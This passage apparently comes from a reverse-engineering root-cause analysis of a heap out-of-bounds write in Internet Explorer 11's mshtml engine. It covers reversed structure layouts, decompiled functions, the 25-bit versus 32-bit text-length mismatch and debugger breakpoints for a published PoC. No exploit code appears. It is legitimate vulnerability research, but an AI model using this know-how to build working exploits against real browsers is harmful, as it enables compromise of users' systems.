    CMarkupUndoBase::CMarkupUndoBase(&this->_InsertUndo, pDoc, v5, v5);
    pInsertSpliceUndo->pVtbl = &CInsertSpliceUndo::`vftable';
    memset(this, InitValue, 0x70u);
}

CTreeNode

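In IE, every pair of tags in the HTML code corresponds to a CTreeNode object. Its _tpBegin and _tpEnd members identify the element's begin tag and end tag. In IE11, the low 12 bits of the third DWORD of a CTreeNode object hold the tag type. Using the enum ELEMENT_TAG from the IE5.5 source code together with the global g_atagdesc table in the pdb file, you can derive the enum values for most tags in this version of the mshtml.dll rendering engine.

The following are some members of the IE11 CTreeNode object that I recovered by reversing.

//CTreeNode object layout (size 0x60, see Tree::TreeWriter::CreateRootNode(), Tree::TreeWriter::CreateElementNode())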

+0x000  CElement* _pElement,//pointer to the element object for this node, CTreeNode::SetElement(), CTreeNode::CTreeNode()
+0x004  CTreeNode* _pNodeParent,//parent of this node in the CTreeNode tree, CTreeNode::CTreeNode()
+0x008  DWORD _FlagsAndEtag,//tag type of the element; the low 12 bits are _etag, CTreeNode::SetElement(), CTreeNode::Parent()
+0x00C  CTreePos _tpBegin, //begin CTreePos of this node, CTreeNode::InitBeginPos()
+0x024  CTreePos _tpEnd, //end CTreePos of this node, CTreeNode::InitEndPos()
+0x03C  SHORT _iCF,//CTreeNode::IsCharFormatValid(),CTreeNode::GetICF(),CTreeNode::GetCharFormatHelper(),CTreeNode::IsDisplayNone()
+0x03E  SHORT _iPF,//CTreeNode::IsParaFormatValid(),CTreeNode::GetIPF()
+0x040  SHORT _iFF,//CTreeNode::IsFancyFormatValid(),CTreeNode::GetIFF()
+0x042  SHORT _iSF,//CTreeNode::IsSvgFormatValid(),CTreeNode::GetISF()
+0x044  DWORD _ulRefs_Flags,//the high 16 bits are the reference count; the node is freed when it drops to 0 (dword), CTreePos::AddRef(), CTreeNode::Release(), CTreeNode::CTreeNode(), CTreeNode::GetTextScaledCharFormat()
+0x048  //CTreeNode::GetLayoutAssociationItemAt()
...
+0x054  CFancyFormat* _pFancyFormat,//CTreeNode::CTreeNode()
+0x058  //CTreeNode::GetCharFormat(),CTreeNode::GetFancyFormat(),CTreeNode::GetSvgFormat(),CTreeNode::GetParaFormat(),CTreeNode::IsDisplayNone()
...
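When reading a CTreeNode from a WinDbg dd dump, the two packed DWORDs above can be decoded as shown below. The sketch assumes the 32-bit layout reversed in this article: _FlagsAndEtag at +0x08 with _etag in its low 12 bits, and the reference count in the high 16 bits of the DWORD at +0x44. The helper names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Offsets and masks as reversed in this article for 32-bit IE11 (assumptions).
constexpr std::size_t kFlagsAndEtagOffset = 0x08;
constexpr std::size_t kRefsFlagsOffset = 0x44;
constexpr uint32_t kEtagMask = 0xFFF;

// Little-endian DWORD read from a raw memory snapshot (e.g. bytes copied from a dump).
uint32_t ReadDword(const uint8_t* base, std::size_t off) {
    return uint32_t(base[off]) | (uint32_t(base[off + 1]) << 8) |
           (uint32_t(base[off + 2]) << 16) | (uint32_t(base[off + 3]) << 24);
}

// Tag type: low 12 bits of _FlagsAndEtag.
uint32_t NodeEtag(const uint8_t* node) {
    return ReadDword(node, kFlagsAndEtagOffset) & kEtagMask;
}

// Reference count: high 16 bits of _ulRefs_Flags.
uint32_t NodeRefCount(const uint8_t* node) {
    return ReadDword(node, kRefsFlagsOffset) >> 16;
}
```

The resulting _etag value can then be looked up against ELEMENT_TAG / g_atagdesc as described above.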

CTreePos

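The begin tag and the end tag of each element each have a corresponding CTreePos object, and both are contained in the CTreeNode object. Through CTreePos objects you can find any tag's position in the DOM stream as well as in the tree. IE links CTreePos objects into a tree through their _pFirstChild and _pNext members. This is the splay tree described earlier, and the _cchLeft member below is maintained for it. IE also links them into the DOM stream (a doubly linked list) through the _pLeft and _pRight members.

The enum EType below gives the type of the element that a CTreePos object corresponds to.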

enum EType { 
    Uninit=0x0,     //position not initialized
    NodeBeg=0x1,    //position is a begin-tag node
    NodeEnd=0x2,    //position is an end-tag node
    Text=0x4,       //position holds text data
    Pointer=0x8     //position holds pointer data; implements an IMarkupPointer
};

The following enum describes how a CTreePos object relates to the CTreePos objects it is connected to in the tree, and also encodes the CTreePos object's type.

// Tree Position Flags
enum {
    TPF_ETYPE_MASK      = 0x0F,
    TPF_LEFT_CHILD      = 0x10,
    TPF_LAST_CHILD      = 0x20,
    TPF_EDGE            = 0x40,
    TPF_DATA2_POS       = 0x40,
    TPF_DATA_POS        = 0x80,
    TPF_FLAGS_MASK      = 0xFF,
    TPF_FLAGS_SHIFT     = 8
};

The following are all members of the IE11 CTreePos object that I recovered by reversing.

//CTreePos object layout (size 0x18, see CTreeNode::InitBeginPos(), CTreeNode::InitEndPos())

+0x000  DWORD _cElemLeftAndFlags,  //number of elements in my left subtree; the low 9 bits are flags, CTreePos::IsNode()
+0x004  DWORD _cchLeft,            //number of characters in my left subtree (maintains the splay tree), CTreePos::GetCpAndMarkup()
+0x008  CTreePos*  _pFirstChild,   //my first child (may be the left or the right child), CTreePos::LeftChild()
+0x00C  CTreePos*  _pNext,         //my right sibling or my parent, CTreePos::RightChild(), CTreePos::Parent()
+0x010  CTreePos* _pLeft,          //the CTreePos to my left in the DOM stream, CTreePos::PreviousNonPtrTreePos()
+0x014  CTreePos* _pRight,         //the CTreePos to my right in the DOM stream, CTreePos::NextNonPtrTreePos()
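To sanity-check the offsets above, the 32-bit layout can be written down with static_asserts. Pointers are modeled as uint32_t, an assumption that keeps the offsets identical even when the code is compiled for x64. CTreeNode embeds _tpBegin at +0x0C and _tpEnd at +0x24, so the owning node of a begin or end position can be recovered by subtracting the offset. This is handy when following _pLeft/_pRight in the debugger. The helper names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// 32-bit CTreePos layout as reversed above; pointers modeled as uint32_t.
struct CTreePos32 {
    uint32_t cElemLeftAndFlags;  // +0x00 element count in left subtree, low bits are flags
    uint32_t cchLeft;            // +0x04 characters in left subtree (splay tree)
    uint32_t pFirstChild;        // +0x08 splay-tree first child
    uint32_t pNext;              // +0x0C right sibling or parent
    uint32_t pLeft;              // +0x10 previous position in the DOM stream
    uint32_t pRight;             // +0x14 next position in the DOM stream
};
static_assert(sizeof(CTreePos32) == 0x18, "CTreePos is 0x18 bytes");
static_assert(offsetof(CTreePos32, pLeft) == 0x10, "_pLeft at +0x10");
static_assert(offsetof(CTreePos32, pRight) == 0x14, "_pRight at +0x14");

// CTreeNode embeds _tpBegin at +0x0C and _tpEnd right after it at +0x24.
constexpr uint32_t kTpBeginOffset = 0x0C;
constexpr uint32_t kTpEndOffset = 0x24;
static_assert(kTpBeginOffset + sizeof(CTreePos32) == kTpEndOffset, "_tpEnd follows _tpBegin");

// Recover the owning CTreeNode address from a node's begin/end position address.
uint32_t NodeFromBeginPos(uint32_t tpBegin) { return tpBegin - kTpBeginOffset; }
uint32_t NodeFromEndPos(uint32_t tpEnd) { return tpEnd - kTpEndOffset; }
```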

CTreeNode::InitBeginPos() initializes the CTreePos object for the begin tag.

CTreePos *__thiscall CTreeNode::InitBeginPos(CTreeNode *this, BOOL fEdge)
{
    CTreePos *_tpBegin; // eax

    // public: class CTreePos * __thiscall CTreeNode::InitBeginPos(int)    
    _tpBegin = &this->_tpBegin;
    // (_tpBegin.GetFlags()&~(CTreePos::TPF_ETYPE_MASK|CTreePos::TPF_DATA_POS|CTreePos::TPF_EDGE)) | BOOLFLAG(fEdge, CTreePos::TPF_EDGE) | CTreePos::NodeBeg
    this->_tpBegin._cElemLeftAndFlags = this->_tpBegin._cElemLeftAndFlags & 0xFFFFFF31 | (fEdge ? 0x41 : 1);// TPF_EDGE = 0x40,NodeBeg=0x1
    return _tpBegin;
}

CTreeNode::InitEndPos() initializes the CTreePos object for the end tag.

CTreePos *__thiscall CTreeNode::InitEndPos(CTreeNode *this, BOOL fEdge)
{
    CTreePos *_tpEnd; // eax

    // public: class CTreePos * __thiscall CTreeNode::InitEndPos(int)  
    _tpEnd = &this->_tpEnd;
    // (_tpEnd.GetFlags()&~(CTreePos::TPF_ETYPE_MASK|CTreePos::TPF_DATA_POS|CTreePos::TPF_EDGE)) | BOOLFLAG(fEdge, CTreePos::TPF_EDGE) | CTreePos::NodeEnd
    this->_tpEnd._cElemLeftAndFlags = this->_tpEnd._cElemLeftAndFlags & 0xFFFFFF32 | (fEdge ? 0x42 : 2);
    return _tpEnd;
}
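The masks in the compiled code differ slightly from the source-level expressions quoted in the comments: 0xFFFFFF31 instead of 0xFFFFFF30 for the begin position, and 0xFFFFFF32 for the end position. The results are identical anyway, because the bit that is kept is ORed back in. The C++ sketch below checks this exhaustively over the low byte (bits 8 and up pass through unchanged in both forms). The function names are hypothetical. Also note that TPF_EDGE and TPF_DATA2_POS share the value 0x40 in the enum above, so the meaning of that bit depends on whether the position is a node or a data position.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kNodeBeg = 0x1, kNodeEnd = 0x2;
constexpr uint32_t kEtypeMask = 0x0F, kEdge = 0x40, kDataPos = 0x80;

// Source-level expressions quoted in the decompiler comments.
uint32_t BeginFlagsSource(uint32_t f, bool fEdge) {
    return (f & ~(kEtypeMask | kDataPos | kEdge)) | (fEdge ? kEdge : 0u) | kNodeBeg;
}
uint32_t EndFlagsSource(uint32_t f, bool fEdge) {
    return (f & ~(kEtypeMask | kDataPos | kEdge)) | (fEdge ? kEdge : 0u) | kNodeEnd;
}

// What the compiled InitBeginPos()/InitEndPos() actually do.
uint32_t BeginFlagsCompiled(uint32_t f, bool fEdge) { return (f & 0xFFFFFF31u) | (fEdge ? 0x41u : 0x01u); }
uint32_t EndFlagsCompiled(uint32_t f, bool fEdge) { return (f & 0xFFFFFF32u) | (fEdge ? 0x42u : 0x02u); }

uint32_t EType(uint32_t f) { return f & kEtypeMask; }
bool IsEdge(uint32_t f) { return (f & kEdge) != 0; }

// Exhaustive check over every low-byte value and both fEdge settings.
bool CompiledMatchesSource() {
    for (uint32_t low = 0; low < 0x100; ++low)
        for (int e = 0; e < 2; ++e)
            if (BeginFlagsSource(low, e != 0) != BeginFlagsCompiled(low, e != 0) ||
                EndFlagsSource(low, e != 0) != EndFlagsCompiled(low, e != 0))
                return false;
    return true;
}
```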

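CTreePos::GetCch() returns the number of characters occupied by the element that a CTreePos object corresponds to. Begin and end tags count as 1 character (in the IE11 code below, a tag position contributes its TPF_EDGE bit, i.e. 1 for an edge position). Text counts its actual number of characters. The character count for pointer data is obtained in CTreePos::ContentCch() (0 or 1). This was mentioned earlier in "A Text-Centric Design", where the DOM stream structure was introduced.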

LONG __thiscall CTreePos::GetCch(CTreeDataPos *this)
{
    DWORD cElemLeftAndFlags; // eax

    // public: long __thiscall CTreePos::GetCch(void)const
    // Purpose: get the character count of this position: 1 for a tag node, the actual character count for text data; for pointer data the count is obtained in CTreePos::ContentCch() (0 or 1)
    cElemLeftAndFlags = this->_cElemLeftAndFlags;
    // BOOL IsNode() const { return TestFlag(NodeBeg|NodeEnd); }
    // BOOL IsText() const { return TestFlag(Text); }
    // long CTreePos::Cch() const { return DataThis()->t._cch; }
    // long GetCch() const { return IsNode()?1:IsText()?Cch():0; }
    if ( (this->_cElemLeftAndFlags & 3) != 0 )    // NodeBeg=0x1,NodeEnd=0x2
        // tag node: the count is the TPF_EDGE bit (1 for an edge position)
        return (cElemLeftAndFlags >> 6) & 1;        // TPF_EDGE = 0x40
    // not a tag node
    if ( (cElemLeftAndFlags & 4) != 0 )           // Text=0x4,IsText()?Cch():0
        // text data
        return this->dptp.t._sid_cch & 0x1FFFFFF;   // the low 25 bits are _cch: this->dptp->t->_cch, Cch()
    return 0;
}
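Restated as portable C++, GetCch() looks like the sketch below. Instead of reading an object, it takes the flags word and the DATAPOSTEXT word as explicit parameters. Two details become visible. First, a node position contributes its TPF_EDGE bit rather than an unconditional 1. Second, for text only the low 25 bits of the DATAPOSTEXT word are used, so the script id stored in the high 7 bits never leaks into the count.

```cpp
#include <cassert>
#include <cstdint>

// Portable restatement of the decompiled CTreePos::GetCch().
// flags:  the _cElemLeftAndFlags DWORD
// sidCch: the DATAPOSTEXT DWORD (_cch:25, _sid:7); ignored for non-text positions
uint32_t GetCch(uint32_t flags, uint32_t sidCch) {
    if ((flags & 0x3) != 0)          // NodeBeg | NodeEnd
        return (flags >> 6) & 1;     // the TPF_EDGE bit
    if ((flags & 0x4) != 0)          // Text
        return sidCch & 0x1FFFFFF;   // low 25 bits = _cch
    return 0;                        // Pointer / uninitialized
}
```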

CTreeDataPos

CTreeDataPos derives from CTreePos and extends it to represent text data and pointer data. This is the key class involved in this vulnerability.

class CTreeDataPos : public CTreePos
{
    ...
    protected:
    union
    {
        DATAPOSTEXT t;
        DATAPOSPOINTER p;
    };
    ...
}

struct DATAPOSTEXT
{
    unsigned long _cch:25;    // [Text] number of characters, CTreePos::ContentCch()
    unsigned long _sid:7;     // [Text] script id of this run
    // This member is only valid when the TPF_DATA2_POS flag is set; otherwise lTextID is assumed to be 0.
    long _lTextID;   // [Text] text ID of the DOM text node
};

struct DATAPOSPOINTER
{
    // [Pointer] my CMarkupPointer and Gravity
    // Gravity:1,Cling:2,
    DWORD_PTR _dwPointerAndGravityAndCling; 
};
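The packing of DATAPOSTEXT's first DWORD can be checked with a C++ bit-field mirror. This sketch assumes the usual MSVC and GCC/Clang behavior on x86, where the first declared bit-field occupies the least significant bits; the C++ standard leaves this implementation-defined. The struct and function names are hypothetical. The sketch shows why the decompiled code reads the count as `_sid_cch & 0x1FFFFFF`, which caps it at 33554431.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Mirror of DATAPOSTEXT's first DWORD (x86 MSVC/GCC/Clang bit-field allocation assumed).
struct DataPosTextWord {
    uint32_t cch : 25;  // character count
    uint32_t sid : 7;   // script id
};
static_assert(sizeof(DataPosTextWord) == 4, "packs into one DWORD");

constexpr uint32_t kCchMask = 0x1FFFFFF;  // (1 << 25) - 1
constexpr uint32_t kMaxCch = kCchMask;    // largest count the field can hold

// Raw DWORD as the decompiler sees it (_sid_cch).
uint32_t Raw(const DataPosTextWord& w) {
    uint32_t raw;
    std::memcpy(&raw, &w, sizeof raw);
    return raw;
}

uint32_t CchFromRaw(uint32_t raw) { return raw & kCchMask; }  // what the decompiled code does
uint32_t SidFromRaw(uint32_t raw) { return raw >> 25; }
```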

The following are all members of the IE11 CTreeDataPos object that I recovered by reversing.

//CTreeDataPos object layout
//Tree::TreeWriter::AllocData1Pos(), 0x28, DATAPOSPOINTER
//Tree::TreeWriter::AllocData2Pos(), 0x2C, DATAPOSTEXT

+0x000  DWORD _cElemLeftAndFlags,//number of elements in my left subtree; the low 9 bits are flags, CTreePos::IsNode()
+0x004  DWORD _cchLeft,//number of characters in my left subtree (maintains the splay tree), CTreePos::GetCpAndMarkup()
+0x008  CTreePos*  _pFirstChild,//my first child (may be the left or the right child), CTreePos::LeftChild()
+0x00C  CTreePos*  _pNext,//my right sibling or my parent, CTreePos::RightChild(), CTreePos::Parent()
+0x010  CTreePos* _pLeft,//the CTreePos to my left in the DOM stream, CTreePos::PreviousNonPtrTreePos()
+0x014  CTreePos* _pRight,//the CTreePos to my right in the DOM stream, CTreePos::NextNonPtrTreePos()
+0x018  ULONG _ulRefs_Flags,//reference count; freed when it reaches 0 (dword); the low 6 bits are flags, CTreePos::AddRef(), CTreePos::IsCData(), CTreePos::IsTextCData(), Tree::TreeWriter::AllocData1Pos()
+0x01C  System::SmartObject *pSmartObject,//CTreePos::Release(),CTreeDataPos::SetTextBlock()
+0x020  Tree::TextData *_pTextData,//CTreeDataPos::GetTextLength(),CTreeDataPos::SetTextData(),CTreePos::ContentPch()
+0x024  DATAPOSTEXT t,//CTreePos::ContentCch(),CTreePos::IsCData(),CTreePos::IsTextCData(),CTreePos::IsTextInLayout(),CTreePos::IsMarkedForDeletion(),CTreePos::IncreaseCounts(),CTreePos::DecreaseCounts()
+0x024  DATAPOSPOINTER p,//CTreePos::IsPointerInLayout(),CTreePos::MarkupPointer()

Tree::TreeWriter::AllocData1Pos() allocates and initializes a CTreeDataPos object for pointer data. In IE8 this function was CMarkup::AllocData1Pos().

CTreeDataPos *__stdcall Tree::TreeWriter::AllocData1Pos()
{
    CTreeDataPos *pTreeDataPos; // eax
    ULONG Flags; // ecx

    // private: static class CTreePos * __stdcall Tree::TreeWriter::AllocData1Pos(void)    
    pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x28u);
    if ( pTreeDataPos )
    {
        Flags = pTreeDataPos->_ulRefs_Flags & 0x37; // keep the low flags except 0x8; the reference count bits are cleared
        pTreeDataPos->pSmartObject = 0;
        pTreeDataPos->_pTextData = 0;
        pTreeDataPos->_cElemLeftAndFlags |= 0x80u;  // set TPF_DATA_POS = 0x80
        pTreeDataPos->_ulRefs_Flags = Flags | 0x40; // reference count = 1 (counted from bit 6); the low 6 bits are flags
        pTreeDataPos->_pNext = 0;
    }
    return pTreeDataPos;
}

Tree::TreeWriter::AllocData2Pos() allocates and initializes a CTreeDataPos object for text data. In IE8 this function was CMarkup::AllocData2Pos().

CTreeDataPos *__stdcall Tree::TreeWriter::AllocData2Pos()
{
    CTreeDataPos *pTreeDataPos; // eax
    ULONG Flags; // ecx

    // private: static class CTreePos * __stdcall Tree::TreeWriter::AllocData2Pos(void)    
    pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x2Cu);
    if ( pTreeDataPos )
    {
        Flags = pTreeDataPos->_ulRefs_Flags;
        pTreeDataPos->pSmartObject = 0;
        pTreeDataPos->_pTextData = 0;
        pTreeDataPos->_cElemLeftAndFlags |= 0xC0u;  // set TPF_DATA_POS = 0x80 and TPF_DATA2_POS = 0x40
        pTreeDataPos->_ulRefs_Flags = Flags & 0x37 | 0x40;// clear flag 0x8 and set the reference count to 1; the low 6 bits are flags
    }
    return pTreeDataPos;
}

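IE11's CTreeDataPos has a new member, _pTextData, which did not exist in IE8 and earlier. Previously, text data was stored in the CTxtArray class and accessed through the CTxtPtr class. IE11 did not abolish that mechanism. Instead, it added a second way of storing text data: the Tree::TextData class.

CTreeDataPos::SetTextData() sets the Tree::TextData object pointer stored in the _pTextData member of a CTreeDataPos object.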

void __thiscall CTreeDataPos::SetTextData(CTreeDataPos *this, Tree::TextData *pNewTextData)
{
    Tree::TextData *pOldTextData; // edx

    // public: void __thiscall CTreeDataPos::SetTextData(class Tree::TextData *)   
    // Purpose: set the Tree::TextData block associated with this CTreeDataPos (AddRef the new block, Release the old one)
    ++pNewTextData->_ulRefs;
    pOldTextData = this->_pTextData;
    if ( pOldTextData )
    {
        if ( pOldTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
    }
    this->_pTextData = pNewTextData;
}

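CTreeDataPos::GetTextLength() can obtain the length of a text string from either of the two text storage structures, CTxtArray and Tree::TextData. The root cause of this vulnerability is that the _cch member of the DATAPOSTEXT structure in CTreeDataPos (25 bits) and the _cch member of Tree::TextData (32 bits) have different sizes, yet the code uses them interchangeably. This mismatch leads to the heap out-of-bounds write. The details are covered in the root cause analysis later on.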

LONG __thiscall CTreeDataPos::GetTextLength(CTreeDataPos *this)
{
    Tree::TextData *pTextData; // eax
    LONG TextLength; // eax

    // public: unsigned long __thiscall CTreeDataPos::GetTextLength(void)const     
    pTextData = this->_pTextData;
    if ( pTextData )
        TextLength = pTextData->_cch;
    else
        TextLength = CTreePos::ContentCch(this);
    return TextLength;
}

LONG __thiscall CTreePos::ContentCch(CTreeDataPos *this)
{
  LONG Cch; // eax

  // public: long __thiscall CTreePos::ContentCch(void)const     
  // Pointer=0x8
  if ( (this->_cElemLeftAndFlags & 8) != 0 && CTreePos::HasCollapsedWhitespace(this) )
    Cch = 1;
  else
    // Text = 0x4
    Cch = this->dptp.t._sid_cch & 0x1FFFFFF;    // key location: only the low 25 bits (DATAPOSTEXT::_cch) are read
  return Cch;
}
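The sketch below models only what the two functions above show. GetTextLength() prefers the 32-bit Tree::TextData::_cch, while ContentCch() returns the 25-bit DATAPOSTEXT::_cch. The structs are hypothetical stand-ins. Purely for illustration, the example assumes that one text position holds all 40370175 characters produced by the PoC's Array(40370176).toString(), and that storing the count into the 25-bit field keeps only its low 25 bits. Under those assumptions, the two "lengths" of the same text differ by exactly 2^25. How this difference turns into the out-of-bounds write in RemoveSplice() is what the rest of the analysis works out.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical stand-ins; only the field widths come from the reversed layouts.
struct TextDataModel {           // Tree::TextData
    int32_t cch;                 // full 32-bit count
};
struct TreeDataPosModel {
    const TextDataModel* pTextData;  // may be null (legacy CTxtArray path)
    uint32_t sidCch;                 // DATAPOSTEXT: low 25 bits are _cch
};

// CTreePos::ContentCch() for a text position: the 25-bit field only.
uint32_t ContentCch(const TreeDataPosModel& tp) { return tp.sidCch & 0x1FFFFFFu; }

// CTreeDataPos::GetTextLength(): prefer Tree::TextData when present.
uint32_t GetTextLength(const TreeDataPosModel& tp) {
    return tp.pTextData ? static_cast<uint32_t>(tp.pTextData->cch) : ContentCch(tp);
}

// Assumed store into the 25-bit field: only the low 25 bits survive, _sid is kept.
uint32_t StoreCch(uint32_t sidCch, uint32_t cch) {
    return (sidCch & ~0x1FFFFFFu) | (cch & 0x1FFFFFFu);
}
```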

CTreeDataPos::AppendText() appends a new string to the end of the existing one.

HRESULT __thiscall CTreeDataPos::AppendText(CTreeDataPos *this, const wchar_t *AppendTextPtr, ULONG AppendTextCch, BOOL a1)
{
    HRESULT hr; // edi
    wchar_t *TargetTextPtr; // eax
    ULONG TargetTextCch; // [esp+Ch] [ebp-8h] BYREF
    Tree::TextData *pTextData; // [esp+10h] [ebp-4h] MAPDST BYREF

    // public: long __thiscall CTreeDataPos::AppendText(unsigned short const *,unsigned long,bool) 
    hr = 0;
    // get the data of the existing text block
    TargetTextPtr = Tree::TextData::GetText(this->_pTextData, 0, &TargetTextCch);
    pTextData = 0;
    // create a new text block (existing text followed by the appended text)
    Tree::TextData::Create(TargetTextPtr, TargetTextCch, AppendTextPtr, AppendTextCch, &pTextData);
    if ( pTextData )
        // point this CTreeDataPos at the new Tree::TextData block
        CTreeDataPos::SetTextData(this, pTextData);
    else
        hr = 0x8007000E;                            // E_OUTOFMEMORY = 0x8007000E
    if ( pTextData )
    {
        if ( pTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pTextData);
    }
    return hr;
}

Tree::TextData

The following are all members of the IE11 Tree::TextData object that I recovered by reversing.

//Tree::TextData object layout (size _cch*2+8, see Tree::TextData::AllocateMemory())

+0x000  ULONG _ulRefs,//reference count, CTreeDataPos::SetTextData()
+0x004  LONG _cch,//number of characters of text data, Tree::TextData::AllocateMemory()
+0x008  wchar_t _TextData[_cch],//Tree::TextData::AllocateMemory()

Tree::TextData::AllocateMemory() allocates memory for a Tree::TextData object.

void __fastcall Tree::TextData::AllocateMemory(LONG cch, Tree::TextData **ppTextData)
{
    Tree::TextData *pNewTextData; // eax
    Tree::TextData *pOldTextData; // edx

    // private: static void __stdcall Tree::TextData::AllocateMemory(long,class SP<class Tree::TextData> &)    
    // Purpose: allocate memory for a text block (2 * cch + 8 bytes)
    pNewTextData = MemoryProtection::HeapAlloc<0>(g_hProcessHeap, 2 * cch + 8);
    if ( pNewTextData )
    {
        pNewTextData->_cch = cch;
        pNewTextData->_ulRefs = 1;
    }
    pOldTextData = *ppTextData;
    *ppTextData = pNewTextData;
    if ( pOldTextData )
    {
        if ( pOldTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
    }
}

Tree::TextData::Create() creates a Tree::TextData object for the string passed in, copies the string into the object's buffer, and returns the object through ppTextData.

void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, Tree::TextData **ppTextData)
{
    // public: static void __stdcall Tree::TextData::Create(unsigned short const *,unsigned long,class SP<class Tree::TextData> &) 
    // Purpose: create a copy of the source text
    Tree::TextData::AllocateMemory(SourceTextCch, ppTextData);
    if ( *ppTextData )
        _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
}

The following function is an overload of the one above that can also append an additional string.

void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, const wchar_t *AdditionalTextPtr, ULONG AdditionalTextCch, Tree::TextData **ppTextData)
{
    // public: static void __stdcall Tree::TextData::Create(unsigned short const *,unsigned long,unsigned short const *,unsigned long,class SP<class Tree::TextData> &)    
    // Purpose: create a text block, optionally appending additional text
    Tree::TextData::AllocateMemory(SourceTextCch + AdditionalTextCch, ppTextData);
    if ( *ppTextData )
    {
        // copy the source text into the new text block
        _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
        if ( AdditionalTextPtr )
            // additional text was supplied: copy it right after the source text in the new block
            _memcpy_s(
            &(*ppTextData)->_TextData[SourceTextCch],
            2 * AdditionalTextCch,
            AdditionalTextPtr,
            2 * AdditionalTextCch);
    }
}

Tree::TextData::GetText() returns a pointer to the text string in a Tree::TextData object, together with its length.

wchar_t *__thiscall Tree::TextData::GetText(Tree::TextData *this, ULONG skip_cch, ULONG *GetedCch)
{
    // public: unsigned short * __thiscall Tree::TextData::GetText(unsigned long,unsigned long *)const     
    // Purpose: return a pointer to the text after skip_cch characters, and the remaining character count
    if ( GetedCch )
        *GetedCch = this->_cch - skip_cch;
    return &this->_TextData[skip_cch];
}
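Putting AllocateMemory(), Create(), GetText(), SetTextData() and AppendText() together, the life cycle of a Tree::TextData block can be modeled in C++. This is a hypothetical re-creation. It keeps the header and the UTF-16 text in separate members instead of one heap block of 2 * cch + 8 bytes, and it uses new/delete instead of MemoryProtection::HeapAlloc/HeapFree. The reference counting follows the decompiled code: SetTextData() takes a reference on the new block and drops one on the old block, and AppendText() releases its local reference after handing the new block to the position.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical stand-in for Tree::TextData (header and text kept separately here).
struct TextData {
    unsigned long ulRefs = 1;  // _ulRefs: AllocateMemory() starts it at 1
    long cch = 0;              // _cch: full 32-bit character count
    std::u16string text;       // _TextData[_cch]
};

// Size of the real single heap block: 8-byte header + UTF-16 characters.
std::size_t RealAllocationSize(long cch) { return 2 * static_cast<std::size_t>(cch) + 8; }

void Release(TextData* td) {
    if (--td->ulRefs == 0) delete td;
}

// Create(src, srcCch, extra, extraCch): a new block holding src followed by extra.
TextData* Create(const char16_t* src, long srcCch, const char16_t* extra, long extraCch) {
    TextData* td = new TextData;
    td->cch = srcCch + extraCch;
    td->text.assign(src, static_cast<std::size_t>(srcCch));
    if (extra != nullptr) td->text.append(extra, static_cast<std::size_t>(extraCch));
    return td;
}

// GetText(skip, &remaining): pointer past `skip` characters plus the remaining count.
const char16_t* GetText(const TextData* td, long skip, long* remaining) {
    if (remaining != nullptr) *remaining = td->cch - skip;
    return td->text.data() + skip;
}

// SetTextData(): AddRef the new block, Release the old one, then store the new one.
void SetTextData(TextData*& slot, TextData* newData) {
    ++newData->ulRefs;
    if (slot != nullptr) Release(slot);
    slot = newData;
}

// AppendText(): copy old + new text into a fresh block, attach it, drop the local reference.
void AppendText(TextData*& slot, const char16_t* add, long addCch) {
    long oldCch = 0;
    const char16_t* old = GetText(slot, 0, &oldCch);
    TextData* fresh = Create(old, oldCch, add, addCch);
    SetTextData(slot, fresh);
    Release(fresh);
}
```

Because Create() copies the old text before SetTextData() releases the old block, appending never reads freed memory. In this model the only length that matters is the 32-bit cch.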

CTxtPtr

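CTxtPtr derives from CRunPtr<CTxtBlk>. It provides access to the character arrays in the backing store (i.e. CTxtArray).

//CTxtPtr object layout (0x14, see CSpliceTreeEngine::RecordSplice()->CTxtPtr::BindToCp())

+0x000  CTxtArray* _prgRun,  // pointer to the CTxtArray
+0x004  LONG _iRun,          // index of an element (run) in the CTxtArray
+0x008  LONG _ich,           // character index within that element's content
+0x00C  DWORD _cp,           // position of the character in the text stream
+0x010  CMarkup *_pMarkup,   // pointer to the owning markup (the whole text-editing object)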

CSpliceTreeEngine::RecordSplice() is the function that CSpliceTreeEngine uses to record a splice of the DOM tree.

HRESULT __thiscall CSpliceTreeEngine::RecordSplice(CSpliceTreeEngine *this)
{
    _this = this;
    hr1 = 0;
    pMarkupSource = this->_pMarkupSource;
    __this = this;
    if ( *(pMarkupSource + 135) < 90000 || (byte_646F1B3E & 0x10) != 0 )
    {
        v65 = 1;
        pTxtPtr = MemoryProtection::HeapAlloc<1>(g_hProcessHeap, 0x14u);
        if ( pTxtPtr )
        {
            tpSourceLCp = CTreePos::GetCpAndMarkup(_this->_ptpSourceL, 0, 0);
            _pMarkupSource = _this->_pMarkupSource;
            pTxtPtr->_pMarkup = _pMarkupSource;
            pTxtPtr->_iRun = 0;
            pTxtPtr->_ich = 0;
            pTxtPtr->_cp = 0;
            pTxtPtr->_prgRun = (_pMarkupSource + 112);
            pTxtPtr->_cp = CTxtPtr::BindToCp(pTxtPtr, tpSourceLCp);
        }
        else
        {
            pTxtPtr = 0;
        }
        pMarkupSource = _this->_pMarkupSource;
    }
    ...
}

DOM tree of the PoC

The PoC used for debugging here is the one published by Ivan Fratric of Google Project Zero, unmodified.

Restart debugging, attach to the IE process, and once the initial breakpoint is hit, set the following two breakpoints.

;bp MSHTML!CSpliceTreeEngine::RemoveSplice: entry point of CSpliceTreeEngine::RemoveSplice()
    .text:63A46320 ; HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
    .text:63A46320 ?RemoveSplice@CSpliceTreeEngine@@QAEJXZ proc near
    .text:63A46320 mov     edi, edi
    .text:63A46322 push    ebp
    .text:63A46323 mov     ebp, esp
